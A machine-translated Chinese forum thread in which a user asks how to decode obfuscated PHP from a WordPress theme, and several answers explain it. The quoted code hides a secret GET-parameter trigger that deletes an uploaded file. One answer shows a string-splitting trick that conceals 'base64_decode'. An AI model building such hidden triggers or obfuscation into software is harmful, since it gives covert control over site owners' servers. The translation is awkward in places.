這是什麼編碼，我該如何解碼？

Question

我最近獲得了一個Wordpress主題，無法弄清楚所有這種編碼是包含大量的下劃線。我已經知道它是做什麼的，但是我沒有想到如何比一個接一個更快地解碼它。你能

1）告訴我什麼是編碼？和 2）如何解碼它，更快？

function aj_________e() { 
     global $_GET, $wt___q; 

     $dw________e = rk_______g(); 
     $xt____________m = pc__p(); 
     $zq_______o = iw__________h(); 

     $ci______m = "full"; 
     if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") { 
      if ($zq_______o == "file") { 
       $rd_________v = $dw________e["dir_upload"]["path"]."/".$xt____________m.".jpg"; 
       if ($wt___q($rd_________v)) { 
        @unlink($rd_________v); 
        $ci______m = "deleted"; 
       } 
      } 

      $uk___s = array(
       "s" => $ci______m, 
       "t" => time(), 
       "v" => WP_ID 
      ); 

      echo "<!--"; 
      foreach ($uk___s AS $ce_____________t => $ik__________m) echo " [$ce_____________t:$ik__________m]"; 
      echo " -->"; 
     } 
    } 

Answer 1

WordPress的是obfucated。你無法輕鬆讀懂它們。關於此：http://en.wikipedia.org/wiki/Obfuscation

Answer 2

我認爲原作者通過某種混淆器運行此代碼。也許聯繫他們一個乾淨的版本？

Answer 3

此代碼會定期用主題供應商控制的更新廣告替換一些文件內容。混淆代碼通常通過廣告獲得一磅肉，包括您不想要的廣告。 （好吧，這段代碼並不是做這件事的 - 但你只在這裏提供了一段代碼。）

你錯過的那個東西就是這樣的東西，它將值base64_decode賦值給一個變量方便地命名爲$csGIYFfb。一旦你知道所有的字符串的值，你可以閱讀代碼：

$HnSjwuR='e'; 
$JBzO='s'; 
$CiCHjis='6'; 
$APNhIK='d'; 
$TWmEOd='d'; 
$jygti='_'; 
$PuGIIg='4'; 
$nyyif='e'; 
$mgtv='o'; 
$AJAsO='a'; 
$LRRqTj='e'; 
$KCHbUS='b'; 
$DjstEZ='c'; 
$csGIYFfb=$KCHbUS.$AJAsO.$JBzO.$LRRqTj.$CiCHjis.$PuGIIg.$jygti.$TWmEOd.$HnSjwuR.$DjstEZ.$mgtv.$APNhIK.$nyyif; 

只是要清楚在這裏，您提供的代碼幾乎混淆 - 它僅僅是變醜，有可能是有意義的變量和函數名稱由包含大量下劃線的隨機字符串替換。您未提供的部分代碼定義了這些功能的含義，這些功能正好使用curl來爲系統填充可能不需要的廣告。